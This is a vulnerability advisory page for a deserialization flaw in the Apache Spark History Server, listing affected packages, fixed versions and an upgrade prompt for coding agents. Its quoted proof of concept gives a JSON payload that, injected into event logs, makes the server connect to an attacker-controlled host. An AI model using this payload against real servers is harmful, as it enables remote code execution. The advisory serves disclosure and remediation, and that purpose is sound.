# CVE-2025-54920: Apache Spark: Spark History Server Code Execution Vulnerability

> Attacker with write access to Spark event logs can execute arbitrary code on the History Server via unsafe Jackson deserialization.

- **Severity:** High 8.8 (`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`)
- **Exploited in the wild:** Not known
- **Login needed:** Any signed-in user
- **Attackable:** Over the internet
- **Victim action needed:** Not needed
- **Fix available:** Yes
- **Published:** 14 Mar 2026
- **Updated:** 17 Mar 2026
- **Also known as:** BIT-spark-2025-54920, CLEANSTART-2026-NF76249, CLEANSTART-2026-XP93276, GHSA-jwp6-cvj8-fw65, MINI-j28q-p62w-chw6, MINI-whc8-crc9-hcjp

## What is CVE-2025-54920?

CVE-2025-54920 is a high-severity unsafe deserialization vulnerability in Apache Spark, published on 14 Mar 2026. Any signed-in user can exploit it over the network, with no action from the victim.

### Official description

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.

Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.

The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.

Proof of Concept:

1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).

2. Inject the following JSON at the beginning of an event log file:

{

  "Event": "org.apache.hive.jdbc.HiveConnection",
  "uri": "jdbc:hive2://<IP>:<PORT>/",
  "info": {
    "hive.metastore.uris": "thrift://<IP>:<PORT>"
  }
}

3. Start the Spark History Server with logs pointing to the modified directory.

4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

Weakness: CWE-502 (Deserialization of Untrusted Data)

## Which versions are affected by CVE-2025-54920?

13 open source packages ship an affected version, including org.apache.spark:spark-core_2.13, spark and org.apache.spark:spark-core_2.10. It affects 1 product.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `org.apache.spark:spark-core_2.13` | Maven | All versions | 3.5.7 |
| `org.apache.spark:spark-core_2.13` | Maven | All versions | 3.5.7 |
| `org.apache.spark:spark-core_2.13` | Maven | From 4.0.0 | 4.0.1 |
| `org.apache.spark:spark-core_2.13` | Maven | From 4.0.0 | 4.0.1 |
| `spark` | Bitnami | All versions | 3.5.7, 4.0.1 |
| `org.apache.spark:spark-core_2.10` | Maven | All versions to 2.2.3 | None |
| `org.apache.spark:spark-core_2.10` | Maven | All versions to 2.2.3 | None |
| `org.apache.spark:spark-core_2.11` | Maven | All versions to 2.4.8 | None |
| `org.apache.spark:spark-core_2.11` | Maven | All versions to 2.4.8 | None |
| `org.apache.spark:spark-core_2.12` | Maven | All versions | 3.5.7 |
| `org.apache.spark:spark-core_2.12` | Maven | All versions | 3.5.7 |
| `org.apache.spark:spark-core_2.9.3` | Maven | All versions to 0.8.1-incubating | None |
| `org.apache.spark:spark-core_2.9.3` | Maven | All versions to 0.8.1-incubating | None |

Products: Apache Spark.

## How do I fix CVE-2025-54920?

Upgrade org.apache.spark:spark-core_2.13 to a fixed version for your release line: 3.5.7 or 4.0.1.

## Is CVE-2025-54920 being exploited?

There is no known exploitation of CVE-2025-54920 in the wild and no public exploit code.

## Other vulnerabilities in Apache Spark

- [CVE-2022-33891](https://insights.sbomify.com/CVE-2022-33891/): Apache Spark Command Injection (high 8.8, exploited in the wild)
- [CVE-2020-9480](https://insights.sbomify.com/CVE-2020-9480/): Improper Authentication in Apache Spark (critical 9.8)
- [CVE-2018-17190](https://insights.sbomify.com/CVE-2018-17190/): Remote Code Execution in spark-core (critical 9.8)
- [CVE-2019-20445](https://insights.sbomify.com/CVE-2019-20445/): HTTP Request Smuggling in Netty (critical 9.1)
- [CVE-2023-32007](https://insights.sbomify.com/CVE-2023-32007/): Apache Spark: Shell command injection via Spark UI (high 8.8)

## Fix prompt for AI coding agents

```text
Check this codebase for CVE-2025-54920 and fix it if it is affected.

What it is: CVE-2025-54920 is a high-severity unsafe deserialization vulnerability in Apache Spark, published on 14 Mar 2026. Any signed-in user can exploit it over the network, with no action from the victim.
Exploitation: There is no known exploitation of CVE-2025-54920 in the wild and no public exploit code.

Affected packages and fixed versions:
- org.apache.spark:spark-core_2.13 (Maven): affected all versions; fixed in 3.5.7
- org.apache.spark:spark-core_2.13 (Maven): affected all versions; fixed in 3.5.7
- org.apache.spark:spark-core_2.13 (Maven): affected from 4.0.0; fixed in 4.0.1
- org.apache.spark:spark-core_2.13 (Maven): affected from 4.0.0; fixed in 4.0.1
- spark (Bitnami): affected all versions; fixed in 3.5.7, 4.0.1
- org.apache.spark:spark-core_2.10 (Maven): affected all versions up to 2.2.3; no fix listed
- org.apache.spark:spark-core_2.10 (Maven): affected all versions up to 2.2.3; no fix listed
- org.apache.spark:spark-core_2.11 (Maven): affected all versions up to 2.4.8; no fix listed
- org.apache.spark:spark-core_2.11 (Maven): affected all versions up to 2.4.8; no fix listed
- org.apache.spark:spark-core_2.12 (Maven): affected all versions; fixed in 3.5.7
- org.apache.spark:spark-core_2.12 (Maven): affected all versions; fixed in 3.5.7
- org.apache.spark:spark-core_2.9.3 (Maven): affected all versions up to 0.8.1-incubating; no fix listed

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/CVE-2025-54920/ (Markdown: https://insights.sbomify.com/CVE-2025-54920/index.md)
```

## Sources

- CVE record: https://www.cve.org/CVERecord?id=CVE-2025-54920
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-54920
- OSV: https://osv.dev/vulnerability/CVE-2025-54920

---
From sbomify Insights: https://insights.sbomify.com/CVE-2025-54920/
Summaries are generated and may contain mistakes; the official description above is the record.
